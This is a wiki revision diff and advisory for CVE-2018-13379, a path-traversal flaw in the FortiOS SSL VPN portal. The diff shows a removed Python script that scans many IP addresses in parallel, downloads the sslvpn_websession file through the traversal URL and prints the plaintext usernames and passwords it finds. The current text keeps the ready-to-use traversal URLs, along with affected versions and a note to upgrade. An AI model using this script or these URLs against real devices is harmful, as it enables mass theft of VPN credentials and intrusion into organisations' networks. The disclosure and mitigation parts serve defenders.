Differences between revisions 5 and 7 (spanning 2 versions)
Revision 5 as of 2019-12-17 15:54:26
Size: 4169
Editor: Sciuro
Comment:
Revision 7 as of 2019-12-20 09:49:47
Size: 1944
Editor: Sciuro
Comment:
Deletions are marked like this. Additions are marked like this.
Line 8: Line 8:
The next URL is responsible: The next example URL are responsible:
Line 16: Line 16:
Just make a request to these URL's and you will get the information needed.

There is a strange fact that if you start a SSLVPN, you have to log in into the webportal on the internet facing part of the Fortigate. After a successful login, the device writes your IP address, username and password in plaintext to the temporary location ''/dev/cmdb/sslvpn_websession''. If you read this file, the current logged in users and passwords will be visible.
Line 18: Line 22:
{{{
import requests, binascii, optparse
from urlparse import urlparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
import multiprocessing

def checkIP(ip):
 try:
  url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
  headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
  r=requests.get(url, headers=headers, verify=False, stream=True, timeout=2)
  img=r.raw.read()
  if "var fgt_lang =" in str(img):
   with open("sslvpn_websession_"+ip+".dat", 'w') as f:
    f.write(img)
   parseFile(ip)
   print "\n"
   return True
  else:
   return False
 except requests.exceptions.ConnectionError:
  return False

def read_bytes(filename, chunksize=8192):
  try:
    with open(filename, "rb") as f:
      while True:
        chunk = f.read(chunksize)
        if chunk:
          for b in chunk:
            yield b
        else:
          break
  except IOError:
    pass

def is_character_printable(s):
  return all((ord(c) < 127) and (ord(c) >= 32) for c in s)
  
def validate_byte_as_printable(byte):
  if is_character_printable(byte):
    return byte
  else:
    return '.'

def parseFile(ip):
 print "[Checking: "+ip+"]"
 url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
 print "[*} Web session at: "+url
 filename="sslvpn_websession_"+ip+".dat"
 memory_address = 0
 ascii_string = ""
 for byte in read_bytes(filename):
   ascii_string = ascii_string + validate_byte_as_printable(byte)
   if memory_address%61 == 60:
     if ascii_string!=".............................................................":
      print ascii_string
     ascii_string = ""
   memory_address = memory_address + 1

parser = optparse.OptionParser()
parser.add_option('-f', action="store", dest="filename")
parser.add_option('-i', action="store", dest="ip", help="e.g. 127.0.0.1:10443")
parser.add_option('-n', action="store", dest="numOfThreads")
options, remainder = parser.parse_args()
numOfThreads=10
ipList=[]
if options.ip:
 ipList.append(options.ip)
if options.filename:
 with open(options.filename) as f:
  ipList = f.read().splitlines()
if options.numOfThreads:
 numOfThreads=int(options.numOfThreads)
ipList = filter(None, ipList)

p = multiprocessing.Pool(processes=numOfThreads)
p.map(checkIP,ipList)
p.close()
}}}
Line 120: Line 42:
----
CategoryNetwork

Contents

  1. General Disclosure
  2. POC
  3. Affected Systems
  4. Possible Mitigations
  5. References

General Disclosure

This is a path-traversal vulnerability in the FortiOS SSL VPN web portal that could potentially allow an unauthenticated attacker to download files through specially crafted HTTP resource requests. Fortinet advises customers to upgrade to FortiOS 5.4.13, 5.6.11, 6.0.6, 6.2.2.

The next example URL are responsible: 

https://<IP>:<PORT>/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://<IP>:<PORT>/remote/fgt_lang?lang=/../../../..//////////////////////////////bin/sh
https://<IP>:<PORT>/remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd

Just make a request to these URL's and you will get the information needed.

There is a strange fact that if you start a SSLVPN, you have to log in into the webportal on the internet facing part of the Fortigate. After a successful login, the device writes your IP address, username and password in plaintext to the temporary location /dev/cmdb/sslvpn_websession. If you read this file, the current logged in users and passwords will be visible.

POC

There is a proof of concept on GitHub

Affected Systems

Here is a list of the operating systems we have tested which are vulnerable to this attack:

  • FortiOS 6.0 - 6.0.0 to 6.0.4
  • FortiOS 5.6 - 5.6.3 to 5.6.7
  • FortiOS 5.4 - 5.4.6 to 5.4.12

Possible Mitigations

Please upgrade!

References

CategoryNetwork

CVE/2018/13379 (last edited 2021-08-12 18:27:51 by Sciuro)